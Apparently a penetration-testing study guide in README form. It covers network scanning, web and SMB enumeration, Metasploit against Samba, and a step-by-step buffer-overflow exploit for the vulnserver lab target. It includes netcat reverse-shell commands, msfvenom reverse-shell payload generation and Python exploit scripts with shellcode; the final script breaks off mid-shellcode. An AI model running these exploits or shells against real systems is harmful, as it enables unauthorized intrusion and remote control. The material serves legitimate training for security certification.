Skip to content

Latest commit

 

History

History
2163 lines (1312 loc) · 58.2 KB

readme.md

File metadata and controls

2163 lines (1312 loc) · 58.2 KB

OSCP Notes

NetDiscover

find out the ip of the machine in the network

netdiscover -i  eth1

netdiscover -r 192.168.134.0/24

ARP Scan

arp-scan --local

Ping Sweep

namp -v -sn 10.11.1.1-254 -oG ping sweep.txt
grep Up ping-sweep.txt | cut -d “ ” -f 2

Find ports

Fast UDP

nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN /root/result.txt <ip>

-sU                         UDP Scan

Shell Script

#!/bin/bash
if [ "$1" == "" ] || [ "$2" == "" ]; then
        echo "Arguments missing usage: <target_ip> <path to log>"
        exit 0
fi
sudo nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN $2 $1

TLS intensive

nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN /root/desktop/result.txt <ip>

-Pn                         Do not ping the host
-sS                         Stealth Scan
--stats-every 3m            Every 3 Min information should come back
--max-retries 1             Only try once
--max-scan-delay 20         nmap should wait a specific time - avoid rait limit
--defeat-rst-ratelimit      don't send ack just send rst to much ack can trigger rait limit - for filtered ports
-T4                         Intesitiy of 4
-p1-65535                   scan all ports
-oN <where to save it>      save the result to a specific file
<ip>                        ip e.g.

Shell Script

#!/bin/bash
if [ "$1" == "" ] || [ "$2" == "" ]; then
        echo "Arguments missing usage: <target_ip> <path to log>"
        exit 0
fi
sudo nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN $2 $1

Specific Ports Scan

nmap -Pn -nvv -p 22,80,8080 --version-intensity 9 -A -oN /home/kali/Desktop/result.txt <ip>

-nvv 
-Pn
-p 22,80,111,139
--version intensity 9 
-A
-oN /root/result.txt
<ip>

Alternative

nmap -sC -sV -oA nmap/active <ip>

Shell Script

#!/bin/bash
if [ "$1" == "" ] || [ "$2" == "" ] || [ "$3" == "" ]; then
        echo "Arguments missing usage: <target_ip> <ports to scan e.g: 80,443> <path to log>"
        exit 0
fi
sudo nmap -Pn -nvv -p $2 --version-intensity 9 -A -oN $3 $1

Use nmap scripts

Find all nmap scripts and grep for specific case

locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb

use script

nmap --script safe -p <target port> <ip>

Enumeration

All kind of enumeration topics

Curl the page

curl -v -X Options <ip>

Search for Domains

Lookup a hostname

nslookup
<ip>

if that fails scan the entire network range

Scan the entire network range

dnsrecon -d <domain> r -<range>
e.g.
dnsrecon -d 10.10.10.10 -r 10.0.0.0/8

Search for Directories

dirb

dirb <url>

dirbuster - with UI

dirbuster

dirbuster with wordlist

dirb <ip> /usr/share/wordlists/x.txt

Good to download a wordlist from github take a big one and remove "manual"

gobuster

For Directoy

gobuster dir -u <ip> -a 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -t 30

-ip in format http://domain.com:5000 
-t threads

To search for files add the ending like

-x aspx

Drupal

Install droopescan via pip https://github.com/SamJoan/droopescan

droopescan scan drupal -u <targetIP> -> Scan takes a long time

Page does not load

That is the case if only 443 is available and you know the DNS by scanning the SSL cert. Try if only the nginx/apache landing page is loaded. Then add the DNS to the hosts file under:

/etc/hosts

in order to pass neginx/apache and show the page.

Searchsploit

Searchsploit "matching name from scans"
Searchsploit -x "pathToExploit"

Log results

it works well to add information to a txt file in the system and watch the result in a second tab.

first tab
[request] > path/scan.txt
second tab 
tail -f path/scan.txt

Wordpress Scan

Plugins are having the potential of beeing outdated.

wpscan --url <url> --enumerate u,ap,at,cb,dbe --disable-tls-checks
ap - include all Plugins
at - include all themes
cb - include all coonfig backups
dbe - database exports
u - enumerate users

Registering an API key gives 25 free requests per day using the API Token afterwards add the token to the scan request

--api-token TOKEN

wpscan --url <url> --enumerate ap,at,cb,dbe --disable-tls-checks --api-token TOKEN 

Check WP Logins by dir

wpscan --url <url> --passwords /location/of/wordlist --usernames <name>

analysis for vulnerabilities

nikto -h <ip> + port :80 or :443 

SMB Enumeration

enum4linux -> 
    SMB Client 
    RPC Client
    NAT and MB Lookup

Has config bug locate smb.conf vim smb.conf

under global add:
client use spnego = no
client ntlmv2 auth = no

enum4linux

find out SAMBA Version

msfconsole
search smb

search for an auxiliary scanner for smb with meatsploit

use auxiliary/scanner/smb/smb_version
put info - includes show options
set rhost <ip>
exploit
--> gives you the version

searchsploit samba 2.2
see exploits compare them to exploit-db

nbtscan <ip> - gives you basic info like NetBIOS Name

smbclient -L <ip>

SAMBA is a good source for exploits

Mount SMB share

https://unix.stackexchange.com/questions/387468/mounting-a-windows-shared-drive-to-kali-linux

to understand what shares are available

smbclient -L hostname -I <ip>

to mount the folder

mount //<ip>/<sharename> /media/<local_name> -o username=user

Gaining Root with Metasploit

msfconsole
search trans2open - use linux version
show targets - there can be a lot of them
show Options - to see the payload

If a static payload is set (to be seen by / in the path it can maybe not work). Solution is to replace that with a generic payload. https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/

Generic (non staged):

set payload generic/shell_reverse_tcp

Staged:

set payload generic/shell/reverse_tcp

exploit maybe leads to success If it fails first try is the payload, then maybe it is the port.

Search for Passwords

grep -Ri password .

DNS Enumeration

zonetransfer

DNS Server

host -t ns zonetransfer.me

Mail Server

host -t mx zonetransfer.me

Host Information

host zonetransfer.me

Zonetransfer information

host -l zonetransfer.me <name server>

gives you unique dns/ip addresses

dnsrecon

dnsrecon -d zonetransfer.me -t axfr
axfr - for Zonetransfer

dnsenum

dnsenum zonetransfer.me

its more clean and faster as the other ones

other types

-FTP
-SNMP
-SMTP

NetCat

try connect to an open port

nc -nv <ip> <port>

listening shell

nc -nvlp <port>

connect

nc -nv <ip> <port> -e cmd.exe
-e execute

Buffer Overflow

Basic

Overview

Kernel      Top         0xffff
Stack                               is going down
Heap                                is going up
Data
Text        Button      0000

Stack

ESP (Extended Stack Pointer)                            Top                     
Buffer Space                                                                
EBP (Extended Base Pointer)                             Base (B for Base)     
EIP (Extended instrctuon Pointer) / Return Address                              

Buffer Space goes down. If there an input validation is wrong the EBP and EIP can be reached Fill the Buffer Space up with x41 (A) x42 (B)

Creation

Fuzzing

A programm that is not properly sanitized will crash if it receives to many bytes.

To Download

vulnserver
Immunity Debugger

First try with fuzzing to find the len of the statement that causes a crash.

fuzzer script

#!/user/bin/python3
import socket

vulnserverHost = "192.168.178.60"
vulserverDefaultPort = 9999
buffer = ["A"]
counter = 100
while len(buffer) <= 30:
    buffer.append("A" * counter)
    counter = counter + 200

for string in buffer:
    print("Fuzzing vulnserver with bytes: " + str(len(string)))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((vulnserverHost, vulserverDefaultPort))
    s.send(('TRUN /.:/' + string).encode())
    s.close()

AF_INET meas IPv4 TRUN is used vulnerable to Bufferoverflow vulserver has a lot of options that go further

fuzzing analysis

open or attach vulnserver in immunity debugger

ESP is the TOP
EBP is the BUTTOM
EIP is the POINTER

The goal is to overwrite the EIP address to point to mallicious code

Try fuzzer again. Debugger will give out an access violation EIP is overwritte with "41414141" so with buzzing reached there and has it overwritten

Finding the Offset

Pattern create

That is a metasploit module which will generate a sequence that has the requested size

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb - l 5900

l - length

5900 bytes is used because that was the amount that caused the crash while fuzzing

Create Pattern Script

#!/user/bin/python3
import socket

vulnserverHost = "192.168.178.60"
vulserverDefaultPort = 9999

shellcode = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho'

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((vulnserverHost, vulserverDefaultPort))
    s.send(('TRUN /.:/' + shellcode).encode())
except:
    print("check debugger")
finally:
    s.close()

find the offset

Save the resulting EIP from immunity Debugger after crash

EIP 386F4337

Now try to put that into the offset

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 5900 -q 386F4337
l - length
q - EIP value

That gives an exact match at offset 2003 bytes

Overwriting the EIP

Try to overwrite the EIP with 4xB (0x42) controlled

#!/user/bin/python3
import socket

vulnserverHost = "192.168.178.60"
vulnserverDefaultPort = 9999

shellcode = "A" * 2003 + "B" * 4

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((vulnserverHost, vulnserverDefaultPort))
    s.send(('TRUN /.:/' + shellcode).encode())
except:
    print("check debugger")
finally:
    s.close()

Immunity Debugger should look point should 42424242 for EIP

Finding Bad Characters

NULL Byte is always bad.

Getting a list: https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/

Remove the \x00 from the list as it is the NULL Byte

Add the Badchars to the shellcode

#!/user/bin/python3
import socket

vulnserverHost = "192.168.56.1"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

badchars = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
    "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
    "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
    "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
    "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
    "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

shellcode = "A" * 2003 + "B" * 4 + badchars

try:
    connect = s.connect((vulnserverHost, 9999))
    s.send(('TRUN /.:/' + shellcode).encode())
except:
    print("check debugger")

s.close()

Immunity Debugger - click on ESP - follow in Dump This has a pattern of counting up. After 42424242 search in the badchars if anything is missing in the list. If anything is missing or wrong that is a bad character. Go through and note all the bad characters. Vulnserver only has the null byte as bad char.

Finding the Right Module

Mona

Download mona module

https://github.com/corelan/mona

put mona.py into immunity debugger/PyCommands folder.

Search in Immunity Debugger

!mona modules

Look in the module info table for all "false" entries. In best case the exe itself has false everywhere. Otherwise it should be a dll.

ASLR would randomize the base address on every start on the system.

essfunc.ddl

Go to Kali and look for the upcode equivalent (convert Assembly language in HEX Code)

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
in Nasm shell:
    JMP ESP 
gives you *FFE4*
(result is always the same)

Go back to immunity debugger

!mona find -s "\xff\xe4" -m essfunc.dll

-s upcode equivialent 
-m module to use

That gives you a list of possible return addresses (the address cannot contain any of the already found bad characters e.g start with 0x0062XXX)

0x625011af

Put a Breakpoint at the memory adress in order to test it with the module.

Back to Kali to write the actual expoit the address has to be written backwards (little endian byte order) http://en.wikipedia.org/wiki/Endianness Generally speaking, the format used to store addresses in memory depends on the archtiecture of running OS. Lillte endian is currently the most widly-used format.

Because the low memory byte is stored in the lowest adress in x64 architecture and the high order byte is the highest address

#!/user/bin/python
import socket

vulnserverHost = "192.168.178.60"
vulnserverDefaultPort = 9999
shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((vulnserverHost, vulnserverDefaultPort))
    s.send('TRUN /.:/' + shellcode)
except:
    print("check debugger")
finally:
    s.close()

b in front of the String ensures that byte is send

Back to Immunity Debugger we need to find the JMP ESP.

Click the Black Arrow with 4 dots and enter the address
625011af

That should bring the FFE4 - JMP ESP. It is needed to test that. Select the live press F2 to create a Breakpoint in Immunity Debugger.

!In order to work properly the module has to be executed in python2.7 ad probably on console

Python3 causes random signs to show up in the EIP (C2) that will destroy the return value.

EIP 625011AF essfunc.625011AF 

should be inside the Debug registers

Generate Shellcode & Gaining Root

generate the shellcode

In kali use msfvenom to generate shellcode

for Windows:

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.6 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"

for Linux:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.2.6 LPORT=4444 EXITFUNC=thread -b "\x00" -f c 

EXITFUNC - for stability#
-f c - generate c shellcode
-a x86 - for architecture
-b - bad characters (add as collected in former section) here only NULL byte is bad
-> "\x00" is always a bad character

Maybe the payload is to big that has to be checked here.

Write the exploit

With that shellcode the exploit has to be written

#!/user/bin/python
import socket

vulnserverHost = "192.168.178.60"
vulnserverDefaultPort = 9999

exploit = (
    b"\xba\x72\xc2\xd0\x94\xd9\xc8\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
    b"\x52\x31\x57\x12\x03\x57\x12\x83\x9d\x3e\x32\x61\x9d\x57\x31"
    b"\x8a\x5d\xa8\x56\x02\xb8\x99\x56\x70\xc9\x8a\x66\xf2\x9f\x26"
    b"\x0c\x56\x0b\xbc\x60\x7f\x3c\x75\xce\x59\x73\x86\x63\x99\x12"
    b"\x04\x7e\xce\xf4\x35\xb1\x03\xf5\x72\xac\xee\xa7\x2b\xba\x5d"
    b"\x57\x5f\xf6\x5d\xdc\x13\x16\xe6\x01\xe3\x19\xc7\x94\x7f\x40"
    b"\xc7\x17\x53\xf8\x4e\x0f\xb0\xc5\x19\xa4\x02\xb1\x9b\x6c\x5b"
    b"\x3a\x37\x51\x53\xc9\x49\x96\x54\x32\x3c\xee\xa6\xcf\x47\x35"
    b"\xd4\x0b\xcd\xad\x7e\xdf\x75\x09\x7e\x0c\xe3\xda\x8c\xf9\x67"
    b"\x84\x90\xfc\xa4\xbf\xad\x75\x4b\x6f\x24\xcd\x68\xab\x6c\x95"
